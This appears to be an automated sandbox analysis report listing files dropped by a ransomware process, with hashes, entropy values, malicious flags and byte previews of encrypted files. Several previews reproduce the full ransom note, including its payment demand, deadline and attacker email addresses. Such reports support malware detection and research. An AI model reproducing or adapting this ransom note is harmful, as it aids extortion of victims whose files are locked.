                                                                                                                                              Preview:.<Ub*j....zO.if..O.......I9.nk.....x5h.6......N..m...I.uI~xQ.I..IV..m.5t..lv6@...7.v,..0...g.c..-hZ5.;.=]xxHVH..<X.r..+5.2.u.;..Dv...C.$......c..D9.......nYRc....W...%...s.1............@....-.E:.0.^e...a.n..5.@.../.7+..sJ.....J3...5. $A...../... ....E......@).......%..C..w..<k.] .a.q..G.O+5.{..;..;.w..Dd.97...N../........#..6..fz...B.a.{.O+.Q(.%7ZAH...hM.&=aq.l..I.P.......39Mn;./...q...w2..4...<`...F.u_...._,..@v....2.&W.........Q....[...K.P....O/UH..q...+@.....X8...1...(. 7....s..pa..IQ../y..W.....q....+4.;.s...L...f.k>.:...g.'/..8..*a.n..~\X.1.y...e....5f.c.......0'>!.v.!.x{.=.n.R.6.S...D.qT*....J..........1...c.].......@.'..!...1xJ....b.`..=C..._.f.;.b}.ms.4W.%...,~...K......c?.-Hl.....7D....K2.3.c..e^.J.....Fj)...1......i..%..TQi.[.N7...~.]....... ..C..A.%No:.#.,m.8.S.....D.&.V..!.J{.....oE:.L/.4.....y.....U.:...Ya.....;...*.X..4...Vhbt3..S.Bh.F+.7=0d@.F.+b.D.a|e..M$....KM...^.-..4...g.....t...M.K.k.....].TM.O.P.....'l.m.n...'.....s......]&...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6547031492485456
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:ZpefhZt6oTk40IfDWUQmwRLpx7B0SDLdOdXv26G43bMzvyn1LPZgZX73O:ZpA/n/JfD0R1lBZUdFD3bM41+5K
                                                                                                                                              MD5:856BDCB76A6C4273BEFCED308758EE6E
                                                                                                                                              SHA1:79C60DEF22C27A39F2A35536DBEAC9A2D5807FE5
                                                                                                                                              SHA-256:F90F1459397AE54189227A390415EDF1F007FD7A94623BF420EF9D5A89A3267F
                                                                                                                                              SHA-512:CDA89ECE3C6CF587A64B81927EBE3D3A31438CDFAC646479FC61E92D0D2ABD95A52BACAE7EA8E49B9F1E217E794DAF2BC735046A26477AC909575F8F29FE6726
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.<Ub*j....zO.if..O.......I9.nk.....x5h.6......N..m...I.uI~xQ.I..IV..m.5t..lv6@...7.v,..0...g.c..-hZ5.;.=]xxHVH..<X.r..+5.2.u.;..Dv...C.$......c..D9.......nYRc....W...%...s.1............@....-.E:.0.^e...a.n..5.@.../.7+..sJ.....J3...5. $A...../... ....E......@).......%..C..w..<k.] .a.q..G.O+5.{..;..;.w..Dd.97...N../........#..6..fz...B.a.{.O+.Q(.%7ZAH...hM.&=aq.l..I.P.......39Mn;./...q...w2..4...<`...F.u_...._,..@v....2.&W.........Q....[...K.P....O/UH..q...+@.....X8...1...(. 7....s..pa..IQ../y..W.....q....+4.;.s...L...f.k>.:...g.'/..8..*a.n..~\X.1.y...e....5f.c.......0'>!.v.!.x{.=.n.R.6.S...D.qT*....J..........1...c.].......@.'..!...1xJ....b.`..=C..._.f.;.b}.ms.4W.%...,~...K......c?.-Hl.....7D....K2.3.c..e^.J.....Fj)...1......i..%..TQi.[.N7...~.]....... ..C..A.%No:.#.,m.8.S.....D.&.V..!.J{.....oE:.L/.4.....y.....U.:...Ya.....;...*.X..4...Vhbt3..S.Bh.F+.7=0d@.F.+b.D.a|e..M$....KM...^.-..4...g.....t...M.K.k.....].TM.O.P.....'l.m.n...'.....s......]&...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.147939510967776
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YcanG5IF0bERFIeZVpm+ToBQ9vCmIZpu39zDrrtEsTswn:tanGWaERFlzpJToKvClzu35rXtn
                                                                                                                                              MD5:04D1458A694EE397DE6C9799556E310F
                                                                                                                                              SHA1:6CFA983B00974D65B6CBCCAB85404CB373D7CDBA
                                                                                                                                              SHA-256:9921B492534B96628545AC4408E9BD42741F5E8A58E6229417E29E60312A3A5F
                                                                                                                                              SHA-512:19D78ADEF609B8BBB85E47C431F97BF9197339FBFD6A4675BCF22949297FED90E854AEDB1BDB1147622AFE215CE4684A97EBC646B61731FCC641C757CC50E8BA
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:W\.....0....B............gR..RO0.*.g..t"..2.,.\m......~..N;...... :.J........3......\.0W....`..z..a.[./....jH.K.......!.IZ.Gt.WE.8......9~...f...R{q..[`S}"..w9V...8_..a..h....pZ~J....%Dp./.b.x9........qN7..D.uq......M..<..Gz..@Yv.i!.....]4...8$+.....].@.x...G....U..W.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):532746
                                                                                                                                              Entropy (8bit):4.257141676348833
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:XgO5ocEznn+Si6iEwyW2hk/PQJYTNkDfSe8f7a:XgO+cEJi6iEwyN8jTNkDKeYa
                                                                                                                                              MD5:9595B3D41A027F847F08E74BE6C2D729
                                                                                                                                              SHA1:1CF9E577134759EA4519A1660668DC1ADF3215EA
                                                                                                                                              SHA-256:E139342FB5E5B4CC15B66688E406FFCB1B80BAAB344E60A146581E6422EEF2BA
                                                                                                                                              SHA-512:38ED8377F67CE51E3086C31E7713D63029C3954D7BF7CA575A7AA54ED0B5BF7578ECD267D6697E140BF9EC07CE3E65FCFF9343306A0D54575C1E5ECF8071525B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.7o.......Q.=...)...r.._.|`..Y./....h..."..d;\.mT..6.4..%<...Q...*.. 1.oJ......Dc\7<.!.3`.q.em ....sx..%v..w=..E.3...7..h...N.D..O.|(".j.t+6...CT;..J.2M@.lf.........Zz:.......w.e..@...G.k.....D.._.t.&........{.9..0.......if^..K........x....X.q.....p2.8..R*.^.G..:..A..<.P...O..;.k.1..:r.}.5A..o...:...>"O..<r...pE.......<...y.l mmb;m.VGN..X.........TN.Y.G.q.:.m....C..m.#%.@.d-...QH..E.B...a.P.Va{,.\..D{...M..].B.....l..p.:....... .....Y..._t.Y.&O...4.pS..."..a....1.k.....a.u.m...y.H.. .3/......f....v........$..NR^.1 .O.<.A......~..1,.Ju.k........b6...N....Xf.,.....}.f.D..h....}EpBI~..4...s...G. .l...'...`.=...D....:....m.......M.?.S..F.Nc....b.&.. ..J..$..X...=..y...7...D.....p.~|.0?....~{Rz1....*JL.ezM..G.6...D....y-|wH{)TPN.?.p.9!-.-.......l....U.s......m.M........4w2.J......jQ?.m..~9v..Kj.I.,r..5.J..v......=...Fx....Z(.r...#.../......(...Zgj,.X...I..."....b3.*.p....{.B.........>y0...>FJ.S..x..3.l>......K..M..l.p.H..@-.l.y.....Us..31....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4693
                                                                                                                                              Entropy (8bit):7.918361778196989
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:sOt8I7ctGOPdz1TNW2drgLct8FoMvyZtzkLpgWG062VM169m:ss8oaGOP5nrw5VvHgWDjJm
                                                                                                                                              MD5:5E1427D76D70A5143532C1F07F2B607B
                                                                                                                                              SHA1:7A8F9C95A4DA1738C9E8AAACC521C81068504042
                                                                                                                                              SHA-256:1CE5556DB79951A5ADCB1E6F223A92BFE774553695911E4CC00A8D167785A5B8
                                                                                                                                              SHA-512:C9896E0C14DF4AF3DB0F8968270DFB0787237799EA0A1700A9B1FAA731104D739EA84AE5EDF1F21F949FADDC55BC78042B97DEE9B33CD294CBF24EFAFFE83D35
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.....F..T>.=.d.}....'Y.k..O....k|F.z..[XK. u.:....IF!.....!.z..c.f...d......2.1..n.{y......Eg.9nIGY.o..!Y...ms.E....X...?...0o.|...d...W....A..z.EU ......KW.ZN....g..3.....Ba.s.d........F#..1......G*e{....QH.....'g.@....<........%..<)..b.....). ;]v...+...f.0_C.5~!..T..`;.u.......YKj.j.g..RBA..#.t...'$..F.$g.fz......8. .9..L.....[....S.:...U@....Z....+yi..r..........]9.[...r.OIh.>....)<c;.f.<.....Vb...f1..GH;......rk....o......../..P..F...>.s\y.......t...RI..k<..j._U.@\.W.".J#5........`.E.hDa.\M?)z.......U.l....+V....V...I}.D..,..l.`&.4.@~.6..G........"o...zt..I.4D\..}.6<.....*V..c.f..........q.".......^..M.=.f.).(.......Y,....[r.~..k>.JP.}A....].6..=...9+.0.'..D.`O..K...1....h..........Q..<zn..$?.M".F.&Z.L.W.L...5.(ly5............HoP.I.....>....eG...S...1..S;..%=....p...!a$.+?."..$...4.C.V..E8..|.IS..#Z .............2.....g../.$.............D..Y..R(8.(a0.U.VB..........<.h..m>.sd.uk.V."..}3.Z.z...1..i..."..U.R.<...D..!..RQ..k/...i
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4693
                                                                                                                                              Entropy (8bit):7.918361778196989
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:sOt8I7ctGOPdz1TNW2drgLct8FoMvyZtzkLpgWG062VM169m:ss8oaGOP5nrw5VvHgWDjJm
                                                                                                                                              MD5:5E1427D76D70A5143532C1F07F2B607B
                                                                                                                                              SHA1:7A8F9C95A4DA1738C9E8AAACC521C81068504042
                                                                                                                                              SHA-256:1CE5556DB79951A5ADCB1E6F223A92BFE774553695911E4CC00A8D167785A5B8
                                                                                                                                              SHA-512:C9896E0C14DF4AF3DB0F8968270DFB0787237799EA0A1700A9B1FAA731104D739EA84AE5EDF1F21F949FADDC55BC78042B97DEE9B33CD294CBF24EFAFFE83D35
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....F..T>.=.d.}....'Y.k..O....k|F.z..[XK. u.:....IF!.....!.z..c.f...d......2.1..n.{y......Eg.9nIGY.o..!Y...ms.E....X...?...0o.|...d...W....A..z.EU ......KW.ZN....g..3.....Ba.s.d........F#..1......G*e{....QH.....'g.@....<........%..<)..b.....). ;]v...+...f.0_C.5~!..T..`;.u.......YKj.j.g..RBA..#.t...'$..F.$g.fz......8. .9..L.....[....S.:...U@....Z....+yi..r..........]9.[...r.OIh.>....)<c;.f.<.....Vb...f1..GH;......rk....o......../..P..F...>.s\y.......t...RI..k<..j._U.@\.W.".J#5........`.E.hDa.\M?)z.......U.l....+V....V...I}.D..,..l.`&.4.@~.6..G........"o...zt..I.4D\..}.6<.....*V..c.f..........q.".......^..M.=.f.).(.......Y,....[r.~..k>.JP.}A....].6..=...9+.0.'..D.`O..K...1....h..........Q..<zn..$?.M".F.&Z.L.W.L...5.(ly5............HoP.I.....>....eG...S...1..S;..%=....p...!a$.+?."..$...4.C.V..E8..|.IS..#Z .............2.....g../.$.............D..Y..R(8.(a0.U.VB..........<.h..m>.sd.uk.V."..}3.Z.z...1..i..."..U.R.<...D..!..RQ..k/...i
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):316
                                                                                                                                              Entropy (8bit):7.309188344875919
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:a0Djr4SPyWCYs1hhOZGDLIQipBBdXTY8mOENVKZsOjUWE9Hn:a0Do3nhOZcCDmfNVKSO4W4n
                                                                                                                                              MD5:BC5D8F861F0D48EBB335C6CC15D5E4B5
                                                                                                                                              SHA1:8D90AA3E262DF31FB658EC5F9E7BBABE6E5839F3
                                                                                                                                              SHA-256:045FD9952D4AE681CF078CC3C46BA7B03AEF941D5D838C160E57A203ACA69231
                                                                                                                                              SHA-512:76FE141582BFBC9E2390A6B7AA10520F2D6E22F93D1DD0B974513883BA2E75E6DA110DE98631177EF8ABD35AA618EA1993792D3069DBA01083CD640E35120244
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:r....R.. .L..$c..~u.m..?....3...7fn.,..ZvS$...8}&.~.6.x..-...9B-^[..O....+d....."..X.....+i...l..F._o.i.TaI4..1Rl......../.o...K.T.....p.aj.+@b..|.;.+.r..S.....\..........^,......W.U..0....$..l...o.U....;$...W7.....o[.....y.@0...!'z...MDA..../..F@.u.O.w..9........`$c ..#..>=\.VD.(\..@(0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):316
                                                                                                                                              Entropy (8bit):7.309188344875919
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:a0Djr4SPyWCYs1hhOZGDLIQipBBdXTY8mOENVKZsOjUWE9Hn:a0Do3nhOZcCDmfNVKSO4W4n
                                                                                                                                              MD5:BC5D8F861F0D48EBB335C6CC15D5E4B5
                                                                                                                                              SHA1:8D90AA3E262DF31FB658EC5F9E7BBABE6E5839F3
                                                                                                                                              SHA-256:045FD9952D4AE681CF078CC3C46BA7B03AEF941D5D838C160E57A203ACA69231
                                                                                                                                              SHA-512:76FE141582BFBC9E2390A6B7AA10520F2D6E22F93D1DD0B974513883BA2E75E6DA110DE98631177EF8ABD35AA618EA1993792D3069DBA01083CD640E35120244
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:r....R.. .L..$c..~u.m..?....3...7fn.,..ZvS$...8}&.~.6.x..-...9B-^[..O....+d....."..X.....+i...l..F._o.i.TaI4..1Rl......../.o...K.T.....p.aj.+@b..|.;.+.r..S.....\..........^,......W.U..0....$..l...o.U....;$...W7.....o[.....y.@0...!'z...MDA..../..F@.u.O.w..9........`$c ..#..>=\.VD.(\..@(0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):98570
                                                                                                                                              Entropy (8bit):0.6450836943301493
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:KfEethYLgAynRAajC7noZA52hV47Q+zdxGJkPbRaT/V8snvgm:KcejiknRN4n6AkVd+RxGobXm
                                                                                                                                              MD5:D349A9D53DBBE59A9CEDD53ED82D057E
                                                                                                                                              SHA1:209DE91814B2B47E989C50CABAEF4D574E18BF17
                                                                                                                                              SHA-256:636C7052470AF12943517E3F71B05A260180CBD82750FC8F2CCB9E8DBC3AF25B
                                                                                                                                              SHA-512:6E296614C061F9D6C5BD46D010240FFB8E6C87F97256ED5AA17837B2D6CCA6274B979C558669E3E8E05C01F1A345AAEC1931504AC53ED7BD886034741D340DB8
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:u;..v.v&..w.o.6..[.[gU.....km.yo..X..@..6....9l._x.Ak.gF..>*.....I....Qe.TF...g.x`....^...tai...l...rE....L_.w..rb.xjxwA.........W..... V........;f..4...V0@W$.v53*Nra.~.W]....~.=E?......'..s...a.7...>.b...%..|.M..0x.S.$.w.-.....<..L.]..]..+6S....h.*i.....u...=...8...IG.q....D'.....} ....;.........0*n..8...3s.V...F..`o1.@...)....n.....`.......K.#8..Q.'CrU...D.E..4.>N.h....uD...N..].......a.....~.....h.&..(..A..5.Z....,.qO.>j.j........?U&..}..?*pw.Q...r.....\......4$9.:..P..%I.>.%....@......*...%.%8....2.".].{1.2&.m+E:T.5.J....~.i!.I.x...k...^..43MG..N.2.,b.9....:.r....>.=........w.l..Ww.....2......'._.>.U........v.X.=.{.F|..`.3..y...._b.f.Y..opX...\E.;,h..<.....CSS.Z......(.jf...w....iX..k.K.5t.m.U....,Ki.jX..B...7...}..P.....Hau'....F.1....Qx.x...uz..$..[-..M7-A....Dk9...)(W]..f.j...AC92MR...l...tco.e"k7!e.w.S.4..<.k.L6Mv.St..P.g}.c...hmk~t.../.4N...%...M)T..~..?$....pRN..?C....co..M..U.Y'....@.>.a..ad..c...YS.v..U9`.K.*R.=....L..u.."..U\.-
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6052050870312353
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:6CQBNAHdj1wVp73PSxRNRUfMC3QPqNoI35X/5s3xUyrTlFN5u:lQBNsdjcp73qxR3yo65Bs3xUWpDY
                                                                                                                                              MD5:0978014319E0110CD56A2FFAE40AECD0
                                                                                                                                              SHA1:F60143FB6313F0146ED1D888CF06D49E887264A8
                                                                                                                                              SHA-256:E102373EF293C0344D4F65032B39F12A890EE54345986BF56BD36258A05744D1
                                                                                                                                              SHA-512:6E84E3F76F1584463B24C6E7C97018DE9E0E865EE16E7913AEFFC42EAA6D8B44693A459EFF6341D2538EBE6C3EF15A71FD9CBBFD8EA9944DAD11BC64E8229990
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.gt .<........v.O.q2=8v@.).Gj...o.f.x.F..../...X.7...i.%1....Y.%.Uh.g....P...#.%:5.....+..}... ........s...6..8...R..wy....:.....J....:.w.......uP...#......)ow.....V`.UM..Lx.v.E.....p.F.u....].?6{.....v..1.....p...C..H>..({.,.7..F....F+.)..h..LC..em..d...,dnf.!H.1..`$j......$-l....u......t.O...........&...J...{..L_.U.T...Qnpij..[.....2.f..|....O..h..H.L*...b.R.......s..4X..M8....=.;6..'....K.J.v.....N_..7..L.k...[.l...+lK=.L..,N...q....5Z.....4:XmVV.N.2..D...l...0.h..V,.(A.........n.....p......C....f..X.....E.;..J .TKvF..}U.@\....P....W..}.....{...e../M"..l........r...2+..S|..;9.G....N$-.X?.@...~.....i.m!(`.j.D.].."..t.Q....v/Gd...=...65....:-I...).....=.Y ..$...|<x?R`...,V.&...y..G/.^-.g....].dG..yyJ@.q...y.c..S.1w..e)..`7I..I;..%z.....o.....:.=.=Z.@..`..R.`'....j.8;...r...T*..a./....A..........(...,...q.Q<.Gq~..r0...U*S>...!....kI..{N.M%.=.;.P...F.b]r.V.N....U4.=.M..].i...z....J..h.....F]..vy.....E...+..d.0..cO..u..jL}......+.8...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6052050870312353
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:6CQBNAHdj1wVp73PSxRNRUfMC3QPqNoI35X/5s3xUyrTlFN5u:lQBNsdjcp73qxR3yo65Bs3xUWpDY
                                                                                                                                              MD5:0978014319E0110CD56A2FFAE40AECD0
                                                                                                                                              SHA1:F60143FB6313F0146ED1D888CF06D49E887264A8
                                                                                                                                              SHA-256:E102373EF293C0344D4F65032B39F12A890EE54345986BF56BD36258A05744D1
                                                                                                                                              SHA-512:6E84E3F76F1584463B24C6E7C97018DE9E0E865EE16E7913AEFFC42EAA6D8B44693A459EFF6341D2538EBE6C3EF15A71FD9CBBFD8EA9944DAD11BC64E8229990
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.gt .<........v.O.q2=8v@.).Gj...o.f.x.F..../...X.7...i.%1....Y.%.Uh.g....P...#.%:5.....+..}... ........s...6..8...R..wy....:.....J....:.w.......uP...#......)ow.....V`.UM..Lx.v.E.....p.F.u....].?6{.....v..1.....p...C..H>..({.,.7..F....F+.)..h..LC..em..d...,dnf.!H.1..`$j......$-l....u......t.O...........&...J...{..L_.U.T...Qnpij..[.....2.f..|....O..h..H.L*...b.R.......s..4X..M8....=.;6..'....K.J.v.....N_..7..L.k...[.l...+lK=.L..,N...q....5Z.....4:XmVV.N.2..D...l...0.h..V,.(A.........n.....p......C....f..X.....E.;..J .TKvF..}U.@\....P....W..}.....{...e../M"..l........r...2+..S|..;9.G....N$-.X?.@...~.....i.m!(`.j.D.].."..t.Q....v/Gd...=...65....:-I...).....=.Y ..$...|<x?R`...,V.&...y..G/.^-.g....].dG..yyJ@.q...y.c..S.1w..e)..`7I..I;..%z.....o.....:.=.=Z.@..`..R.`'....j.8;...r...T*..a./....A..........(...,...q.Q<.Gq~..r0...U*S>...!....kI..{N.M%.=.;.P...F.b]r.V.N....U4.=.M..].i...z....J..h.....F]..vy.....E...+..d.0..cO..u..jL}......+.8...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.170503590236353
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:pjnD/6Xi1ySdW09nMiNQC0Gxet3T3szYq/+voBDkEOshjX5Nen:pzYi1M0ZNkGxeBUnzOEX5Nen
                                                                                                                                              MD5:35B067DF20F0897FACD27442A6FE49E7
                                                                                                                                              SHA1:8D1B7F99C533C2780C1BD4D45BD07D258BB62744
                                                                                                                                              SHA-256:D5F24ACFCEA8A909FDDC7B1AE950E3E4285AD1E46908736CF8210BBF701EED5D
                                                                                                                                              SHA-512:CBC0151AB18900608B0F5C947C0DF75696ABC495A0570A97298E5FFDDA7E0F2DA87124018D4E3EB1DC707D403DBF81EBEEB89B409E9A84A7B7940FFF256AC218
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:R.H.z....}V...n...........0.b.z_.(..l.t..#.@'....#..q..../"....Tu....s.....H.KH..|l^.........u..$/.......p.).......d....j...S]n.ob2..U..h.E.K.D.......L.q....+..Zq..S.....b.b"+..g....N.;.y...<..c.o..R4.s...._j6...RQ...V..$.[.m.....L...p...$.>l..=....,..lwCS.,.rW..(Q.3.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):98570
                                                                                                                                              Entropy (8bit):0.6450836943301493
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:KfEethYLgAynRAajC7noZA52hV47Q+zdxGJkPbRaT/V8snvgm:KcejiknRN4n6AkVd+RxGobXm
                                                                                                                                              MD5:D349A9D53DBBE59A9CEDD53ED82D057E
                                                                                                                                              SHA1:209DE91814B2B47E989C50CABAEF4D574E18BF17
                                                                                                                                              SHA-256:636C7052470AF12943517E3F71B05A260180CBD82750FC8F2CCB9E8DBC3AF25B
                                                                                                                                              SHA-512:6E296614C061F9D6C5BD46D010240FFB8E6C87F97256ED5AA17837B2D6CCA6274B979C558669E3E8E05C01F1A345AAEC1931504AC53ED7BD886034741D340DB8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:u;..v.v&..w.o.6..[.[gU.....km.yo..X..@..6....9l._x.Ak.gF..>*.....I....Qe.TF...g.x`....^...tai...l...rE....L_.w..rb.xjxwA.........W..... V........;f..4...V0@W$.v53*Nra.~.W]....~.=E?......'..s...a.7...>.b...%..|.M..0x.S.$.w.-.....<..L.]..]..+6S....h.*i.....u...=...8...IG.q....D'.....} ....;.........0*n..8...3s.V...F..`o1.@...)....n.....`.......K.#8..Q.'CrU...D.E..4.>N.h....uD...N..].......a.....~.....h.&..(..A..5.Z....,.qO.>j.j........?U&..}..?*pw.Q...r.....\......4$9.:..P..%I.>.%....@......*...%.%8....2.".].{1.2&.m+E:T.5.J....~.i!.I.x...k...^..43MG..N.2.,b.9....:.r....>.=........w.l..Ww.....2......'._.>.U........v.X.=.{.F|..`.3..y...._b.f.Y..opX...\E.;,h..<.....CSS.Z......(.jf...w....iX..k.K.5t.m.U....,Ki.jX..B...7...}..P.....Hau'....F.1....Qx.x...uz..$..[-..M7-A....Dk9...)(W]..f.j...AC92MR...l...tco.e"k7!e.w.S.4..<.k.L6Mv.St..P.g}.c...hmk~t.../.4N...%...M)T..~..?$....pRN..?C....co..M..U.Y'....@.>.a..ad..c...YS.v..U9`.K.*R.=....L..u.."..U\.-
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.101654363948449
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:x0FlwbWBt2uzOwFo3LPWT16j2JsPP8snbv7eRay9c/Tvmn:x0HRFCeq2eP8sbTegtvmn
                                                                                                                                              MD5:E87C71A15B46A73AD951F9ED90EA4853
                                                                                                                                              SHA1:58B408CF30994A90D9F58BE972A8FBBA2816CEFC
                                                                                                                                              SHA-256:D508EF537A68DB785AE5EB164C786656004714B69F7AC8852B9D958AA3383026
                                                                                                                                              SHA-512:BFBD43346E23DEE8C42C09929F22F828376C746EED002CA1AFD5BAF527B4FAD6EFC736B8CDCAD0CC16E909E386F5C44C724C867FA3214413F49844FAD79E303D
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:]+.?)$...................{....R.....D...6mB.d....K..i....?o...e.J.......i....E..8....FK.S..Y...B...B.O...A..P<G..e.<.).,.F....y.t.5..G..k.!......q.XjNM.xiE...=B.i.U../n,%h..L...m.q1tL.y......X..,27.JxP ....R>..{.P..1c..O.8:....z...k..oc}...<}....[W...h...F$<.6.w(0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
